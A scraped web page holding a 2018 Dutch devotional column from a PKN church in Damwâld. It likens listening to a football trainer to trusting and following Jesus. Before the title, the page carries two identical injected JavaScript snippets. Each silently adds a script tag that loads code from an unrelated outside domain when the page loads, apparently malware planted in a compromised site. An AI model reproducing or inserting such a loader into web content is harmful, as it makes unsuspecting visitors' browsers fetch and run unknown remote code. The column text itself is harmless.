;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Luister jij naar de trainer? - PKN Damwâld

Luister jij naar de trainer?

Gepubliceerd op: maandag 23 april 2018

‘Sta op’ of ‘ga staan’ is de Nederlandse vertaling. We gaan vaak staan op een dag, tenminste wanneer je niet aan een rolstoel gekluisterd bent. Je stapt ’s morgens uit je bed. Zin of geen zin, je gaat staan. Daar denk je niet bij na. Je doet het gewoon. In figuurlijke zin gaan we ook best veel staan. Dan hebben we vaak wel iets meer motivatie nodig. We denken er over na… wat gaan we doen. Wel of niet….
Kom jij in beweging voor…… Ja, waar komen wij voor in beweging? De één stort zich op het werk, de ander komt ook voor het milieu, weer een ander loopt veel collectes, weer een ander…. Of voor sport… da’s natuurlijk één en al beweging. Het wordt vaak van jongs-af-aan al fanatiek gedaan. Je gaat bijvoorbeeld naar voetbal. Kun je dan al voetballen? Ja je kunt vast al een beetje tegen een bal trappen maar voetballen alla Messi? Nee, voetballen dat moet nog geleerd worden. De trainer vraagt jou hard te gaan lopen, hij doet dingen voor, hij geeft tips, hij motiveert en stimuleert je als het weer even niet wil of als je valt, hij corrigeert je ook, hij geeft je vertrouwen ‘toe maar je kunt het’. De vraag is echter wel…. luister je naar de trainer? Doe je wat hij zegt? Of denk je bij jezelf.. ‘ha, ha daar heb ik vandaag geen zin in, laat maar, ik…’. Eigenlijk zeg je ‘ik weet het beter’. Wat zou het gevolg zijn van het feit dat de spelers niet naar de trainer luisteren, of een deel van de spelers? Dat demotiveert een team. Maar jij komt ook niet uit op het punt waar jij uit kunt komen. De trainer wil jou het maximale gunnen. Misschien kunnen jullie met al jullie inzet kampioen worden maar dan moet je je wel inzetten….. Kortom durf jij de trainer alle vertrouwen te geven en echt te doen wat hij zegt zodat je het maximale kunt behalen. Vaak de overwinning als je samen met elkaar, ECHT luistert.
Ja, zegt u, leuke column, we lezen dit omdat het voor de kerk is, we zijn niet met voetbal bezig? Nou… we kunnen er veel van leren. De vraag aan de voetballers ten aanzien van voetbal is dezelfde als aan ons ten aanzien van onze houding ten opzichte van God, Zijn Zoon en de Heilige Geest. Durven wij te luisteren naar wat Jezus zegt? Hij heeft ons veel voorgedaan, Hij heeft ons veel uitgelegd hoe Het Woord werkelijk te lezen. Hij gaf tips hoe we met mensen om zouden moeten gaan om zo het maximale geluk uit relaties onderling te halen, Hij motiveert mensen in plaats van hen in een hoekje te zetten, Hij…
De vraag is net als bij de voetballers: durven wij Hem volledig te vertrouwen en te handelen? Of denken we … ‘ik weet het beter, geloof moet een beetje….?’. Hij stierf voor jou, had alles voor jou over, Hij stond op om jou de overwinning te geven. De engelen bij het open graf, het graf van volle genade voor hen die willen luisteren, vroegen de vrouwen de verwarde discipelen die vertwijfeld in Jeruzalem zaten te vertellen ‘Hij gaat jullie voor naar Galilea en daar zal je Hem zien’ (Mattheüs 28: 7b). Het is een stap in geloof om te gaan, te handelen en te doen. Een stap die vraagt om vertrouwen in de Trainer. Wat je mag motiveren? ‘Je zult Hem zien’. Jij wilt toch ook een goede voetballer/teamplayer in Gods Koninkrijk hier op aarde worden?!! Luister dan naar de Trainer en handel naar Zijn woorden! De overwinning? Daar ben je dan al zeker van! Das pas lekker trainen.. ga er voor!

Columnist:Ypie

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns